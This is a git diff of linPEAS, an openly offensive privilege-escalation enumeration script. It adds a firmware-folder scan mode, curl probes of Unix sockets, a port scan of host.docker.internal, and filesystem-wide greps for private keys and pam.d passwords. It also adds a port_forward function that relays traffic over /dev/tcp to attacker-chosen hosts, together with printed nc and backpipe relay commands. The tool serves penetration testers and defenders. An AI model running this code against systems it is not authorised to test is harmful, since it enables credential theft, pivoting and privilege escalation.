print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" - ls -l /private/var/db/emondClients +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PSC) systemd PATH + print_2title "Systemd PATH" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths" + systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" + WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") echo "" fi -#-- PCS) Services -if [ "$EXTRA_CHECKS" ]; then - print_2title "Services" - print_info "Search for outdated versions" - (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" - echo "" -fi - -#-- PSC) systemd PATH -print_2title "Systemd PATH" -print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths" -systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" -WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") -echo "" - #-- PSC) .service files #TODO: .service files in MACOS are folders print_2title "Analyzing .service files" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services" printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do - if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + if [ ! -O "$s" ] || [ "$SEARCH_IN_FOLDER" ]; then #Remove services that belongs to the current user or if firmware see everything + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" fi servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths @@ -165,17 +186,19 @@ done if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi echo "" -#-- PSC) Timers -print_2title "System timers" -print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers" -(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found -echo "" +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PSC) Timers + print_2title "System timers" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers" + (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found + echo "" +fi #-- PSC) .timer files print_2title "Analyzing .timer files" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers" printf "%s\n" "$PSTORAGE_TIMER" | while read t; do - if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + if ! [ "$IAMROOT" ] && [ -w "$t" ] && ! [ "$SEARCH_IN_FOLDER" ]; then echo "$t" | sed -${E} "s,.*,${SED_RED},g" fi timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) @@ -197,7 +220,7 @@ if ! [ "$IAMROOT" ]; then print_2title "Analyzing .socket files" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets" printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" fi socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') @@ -214,20 +237,26 @@ if ! [ "$IAMROOT" ]; then done done echo "" - - print_2title "Unix Sockets Listening" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets" - # Search sockets using netstat and ss - unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") - fi - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) + + if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Unix Sockets Listening" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets" + # Search sockets using netstat and ss + unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) + if ! [ "$unix_scks_list" ];then + unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") + fi + if ! [ "$unix_scks_list" ];then + unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) + fi fi - # But also search socket files - unix_scks_list2=$(find / -type s 2>/dev/null) + if ! [ "$SEARCH_IN_FOLDER" ]; then + # But also search socket files + unix_scks_list2=$(find / -type s 2>/dev/null) + else + unix_scks_list2=$(find "SEARCH_IN_FOLDER" -type s 2>/dev/null) + fi # Detele repeated dockets and check permissions (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do @@ -238,10 +267,20 @@ if ! [ "$IAMROOT" ]; then if [ -w "$l" ];then perms="${perms}Write" fi + + if [ "$EXTRA_CHECKS" ] && [ "$(command -v curl)" ]; then + CANNOT_CONNECT_TO_SOCKET="$(curl -v --unix-socket "$l" --max-time 1 http:/linpeas 2>&1 | grep -i 'Permission denied')" + if ! [ "$CANNOT_CONNECT_TO_SOCKET" ]; then + perms="${perms} - Can Connect" + else + perms="${perms} - Cannot Connect" + fi + fi + if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; else echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" + echo " └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g" # Try to contact the socket socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) if [ $? -eq 0 ]; then @@ -260,7 +299,7 @@ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-b if [ "$PSTORAGE_DBUS" ]; then printf "%s\n" "$PSTORAGE_DBUS" | while read d; do for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + if ! [ "$IAMROOT" ] && [ -w "$f" ] && ! [ "$SEARCH_IN_FOLDER" ]; then echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" fi @@ -282,19 +321,21 @@ if [ "$PSTORAGE_DBUS" ]; then fi echo "" -print_2title "D-Bus Service Objects list" -print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus" -dbuslist=$(busctl list 2>/dev/null) -if [ "$dbuslist" ]; then - busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; - if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "D-Bus Service Objects list" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus" + dbuslist=$(busctl list 2>/dev/null) + if [ "$dbuslist" ]; then + busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; + if ! echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," + fi fi - fi - done -else echo_not_found "busctl" + done + else echo_not_found "busctl" + fi fi diff --git a/linPEAS/builder/linpeas_parts/5_network_information.sh b/linPEAS/builder/linpeas_parts/5_network_information.sh index 6c4c69f..402b579 100644 --- a/linPEAS/builder/linpeas_parts/5_network_information.sh +++ b/linPEAS/builder/linpeas_parts/5_network_information.sh @@ -155,6 +155,10 @@ if [ "$AUTO_NETWORK_SCAN" ]; then echo "" fi done + + print_3title "Scanning top ports of host.docker.internal" + (tcp_port_scan "host.docker.internal" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null + echo "" fi fi diff --git a/linPEAS/builder/linpeas_parts/7_software_information.sh b/linPEAS/builder/linpeas_parts/7_software_information.sh index d6441c1..6a1c712 100644 --- a/linPEAS/builder/linpeas_parts/7_software_information.sh +++ b/linPEAS/builder/linpeas_parts/7_software_information.sh @@ -5,14 +5,14 @@ NGINX_KNOWN_MODULES="ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so" #-- SI) Useful software -if ! [ "SEARCH_IN_FOLDER" ]; then +if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Useful software" for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done echo "" fi #-- SI) Search for compilers -if ! [ "SEARCH_IN_FOLDER" ]; then +if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Installed Compilers" (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); echo "" @@ -221,20 +221,30 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" writable_agents=$(find /tmp /etc /home -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null) +else + sshconfig="$(ls ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null)" + hostsdenied="$(ls ${ROOT_FOLDER}etc/hosts.denied 2>/dev/null)" + hostsallow="$(ls ${ROOT_FOLDER}etc/hosts.allow 2>/dev/null)" + writable_agents=$(find ${ROOT_FOLDER} -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null) fi peass{SSH} grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," -if [ "$TIMEOUT" ]; then - privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) - privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) - privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) - privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) +if ! [ "$SEARCH_IN_FOLDER" ]; then + if [ "$TIMEOUT" ]; then + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) + else + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) + fi else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) + # If $SEARCH_IN_FOLDER lets just search for private keys in the whole firmware + privatekeyfilesetc=$(timeout 120 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' "$ROOT_FOLDER" 2>/dev/null) fi if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then @@ -267,7 +277,7 @@ if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then ssh-add -l echo "" fi -if gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"; then +if gpg-connect-agent "keyinfo --list" /bye 2>/dev/null | grep "D - - 1"; then print_3title "Listing gpg keys cached in gpg-agent" gpg-connect-agent "keyinfo --list" /bye echo "" @@ -284,29 +294,29 @@ fi if [ "$hostsdenied" ]; then print_3title "/etc/hosts.denied file found, read the rules:" printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + cat " ${ROOT_FOLDER}etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," echo "" fi if [ "$hostsallow" ]; then print_3title "/etc/hosts.allow file found, trying to read the rules:" printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + cat " ${ROOT_FOLDER}etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," echo "" fi if [ "$sshconfig" ]; then echo "" echo "Searching inside /etc/ssh/ssh_config for interesting info" - grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," + grep -v "^#" ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," fi echo "" peass{PAM Auth} #-- SI) Passwords inside pam.d -pamdpass=$(grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#") +pamdpass=$(grep -Ri "passwd" ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#") if [ "$pamdpass" ] || [ "$DEBUG" ]; then print_2title "Passwords inside pam.d" - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," + grep -Ri "passwd" ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," echo "" fi @@ -558,26 +568,30 @@ peass{Cache Vi} peass{Wget} ##-- SI) containerd installed -containerd=$(command -v ctr) -if [ "$containerd" ] || [ "$DEBUG" ]; then - print_2title "Checking if containerd(ctr) is available" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation" - if [ "$containerd" ]; then - echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - ctr image list 2>&1 +if ! [ "$SEARCH_IN_FOLDER" ]; then + containerd=$(command -v ctr) + if [ "$containerd" ] || [ "$DEBUG" ]; then + print_2title "Checking if containerd(ctr) is available" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation" + if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + ctr image list 2>&1 + fi + echo "" fi - echo "" fi ##-- SI) runc installed -runc=$(command -v runc) -if [ "$runc" ] || [ "$DEBUG" ]; then - print_2title "Checking if runc is available" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation" - if [ "$runc" ]; then - echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," +if ! [ "$SEARCH_IN_FOLDER" ]; then + runc=$(command -v runc) + if [ "$runc" ] || [ "$DEBUG" ]; then + print_2title "Checking if runc is available" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation" + if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + fi + echo "" fi - echo "" fi #-- SI) Docker diff --git a/linPEAS/builder/linpeas_parts/8_interesting_files.sh b/linPEAS/builder/linpeas_parts/8_interesting_files.sh index 4e0ce6f..d3c932e 100644 --- a/linPEAS/builder/linpeas_parts/8_interesting_files.sh +++ b/linPEAS/builder/linpeas_parts/8_interesting_files.sh @@ -279,14 +279,25 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi fi -##-- IF) Executable files added by user -print_2title "Executable files added by user (limit 70)" -if ! [ "$SEARCH_IN_FOLDER" ]; then - find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort | tail -n 70 -else - find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort | tail -n 70 +##-- IF) Date times inside firmware +if [ "$SEARCH_IN_FOLDER" ]; then + print_2title "FIles datetimes inside the firmware (limit 50)" + find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50 + echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"\"" + echo "" fi +##-- IF) Executable files added by user +print_2title "Executable files potentially added by user (limit 70)" +if ! [ "$SEARCH_IN_FOLDER" ]; then + find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70 +else + find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70 +fi +echo "" + + + if [ "$MACPEAS" ]; then print_2title "Unsigned Applications" macosNotSigned /System/Applications @@ -454,7 +465,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then ##-- IF) Mail applications print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" + ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq echo "" ##-- IF) Mails diff --git a/linPEAS/builder/linpeas_parts/linpeas_base.sh b/linPEAS/builder/linpeas_parts/linpeas_base.sh index c01e0d0..c2d8274 100755 --- a/linPEAS/builder/linpeas_parts/linpeas_base.sh +++ b/linPEAS/builder/linpeas_parts/linpeas_base.sh @@ -65,6 +65,7 @@ DEBUG="" AUTO_NETWORK_SCAN="" EXTRA_CHECKS="" REGEXES="" +PORT_FORWARD="" THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")" [ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 [ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2 @@ -78,15 +79,18 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW} -t${BLUE} Automatic network scan & Internet conectivity checks - This option writes to files ${YELLOW} -r${BLUE} Enable Regexes (this can take from some mins to hours) ${YELLOW} -P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - ${YELLOW} -D${BLUE} Debug mode + ${YELLOW} -D${BLUE} Debug mode ${GREEN} Network recon: ${YELLOW} -t${BLUE} Automatic network scan & Internet conectivity checks - This option writes to files - ${YELLOW} -d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 + ${YELLOW} -d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 ${YELLOW} -p -d ${BLUE} Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139 ${YELLOW} -i [-p ]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 $GREEN Notice${BLUE} that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed + ${GREEN} Port forwarding: + ${YELLOW} -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT${BLUE} Execute linpeas to forward a port from a local IP to a remote IP + ${GREEN} Firmware recon: ${YELLOW} -f ${BLUE} Execute linpeas to search passwords/file permissions misconfigs inside a folder @@ -98,7 +102,7 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW} -q${BLUE} Do not show banner ${YELLOW} -N${BLUE} Do not use colours$NC" -while getopts "h?asd:p:i:P:qo:LMwNDterf:" opt; do +while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do case "$opt" in h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; a) FAST="";EXTRA_CHECKS="1";; @@ -117,7 +121,15 @@ while getopts "h?asd:p:i:P:qo:LMwNDterf:" opt; do t) AUTO_NETWORK_SCAN="1";; e) EXTRA_CHECKS="1";; r) REGEXES="1";; - f) SEARCH_IN_FOLDER=$OPTARG; ROOT_FOLDER=$OPTARG; REGEXES="1"; CHECKS="software_information,interesting_files,api_keys_regex";; + f) SEARCH_IN_FOLDER=$OPTARG; + if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then #Make sure firmware folder ends with "/" + SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/"; + fi; + ROOT_FOLDER=$SEARCH_IN_FOLDER; + REGEXES="1"; + CHECKS="procs_crons_timers_srvcs_sockets,software_information,interesting_files,api_keys_regex";; + + F) PORT_FORWARD=$OPTARG;; esac done @@ -510,11 +522,11 @@ TIMEOUT="$(command -v timeout 2>/dev/null)" STRACE="$(command -v strace 2>/dev/null)" STRINGS="$(command -v strings 2>/dev/null)" -shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" +shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" notBackup="/tdbbackup$|/db_hotbackup$" -cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-notifier-common|upstart|" +cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-motd|update-notifier-common|upstart|" cronjobsB="centreon" processesVB='jdwp|tmux |screen | inspect |--inspect[= ]|--inspect$|--inpect-brk|--remote-debugging-port' @@ -577,7 +589,7 @@ elif [ -f "/bin/bash" ] && ! [ -L "/bin/bash" ]; then FOUND_BASH="/bin/bash"; fi if [ "$FOUND_BASH" ]; then - SCAN_BAN_GOOD="$YELLOW[+] $GREEN$FOUND_BASH${BLUE} is available for network discovery & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)\n" + SCAN_BAN_GOOD="$YELLOW[+] $GREEN$FOUND_BASH${BLUE} is available for network discovery, port scanning and port forwarding$LG ($SCRIPTNAME can discover hosts, scan ports, and forward ports. Learn more with -h)\n" fi FOUND_NC=$(command -v nc 2>/dev/null) @@ -826,8 +838,8 @@ tcp_recon (){ for port in $PORTS; do for j in $(seq 1 254) do - if [ "$FOUND_BASH" ] && [ "$$TIMEOUT" ]; then - $TIMEOUT 5 $FOUND_BASH -c "(echo /dev/null && echo -e \"\n[+] Open port at: $IP3.$j:$port\"" & + if [ "$FOUND_BASH" ] && [ "$TIMEOUT" ]; then + $TIMEOUT 2.5 $FOUND_BASH -c "(echo /dev/null && echo -e \"\n[+] Open port at: $IP3.$j:$port\"" & elif [ "$NC_SCAN" ]; then ($NC_SCAN "$IP3"."$j" "$port" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & fi @@ -946,6 +958,24 @@ discovery_port_scan (){ } +port_forward (){ + LOCAL_IP=$1 + LOCAL_PORT=$2 + REMOTE_IP=$3 + REMOTE_PORT=$4 + + echo "In your local machine execute:" + echo "cd /tmp; rm backpipe; mknod backpipe p;" + echo "nc -lvnp $LOCAL_PORT 0backpipe" + echo "" + echo "Press any key when you have executed the commands" + read -n 1 + + bash -c "exec 3<>/dev/tcp/$REMOTE_IP/$REMOTE_PORT; exec 4<>/dev/tcp/$LOCAL_IP/9009; cat <&3 >&4 & cat <&4 >&3 &" + echo "If not error was indicated, your local port $LOCAL_PORT should be forwarded to $REMOTE_IP:$REMOTE_PORT" +} + + ########################################### #---) Exporting history env variables (---# ########################################### @@ -1031,11 +1061,45 @@ elif [ "$IP" ]; then exit 0 fi +if [ "$PORT_FORWARD" ]; then + if ! [ "$FOUND_BASH" ]; then + printf $RED"[-] Err: Port forwarding not possible, no bash in PATH\n"$NC; + exit 0 + fi + + LOCAL_IP="$(echo -n $PORT_FORWARD | cut -d ':' -f 1)" + 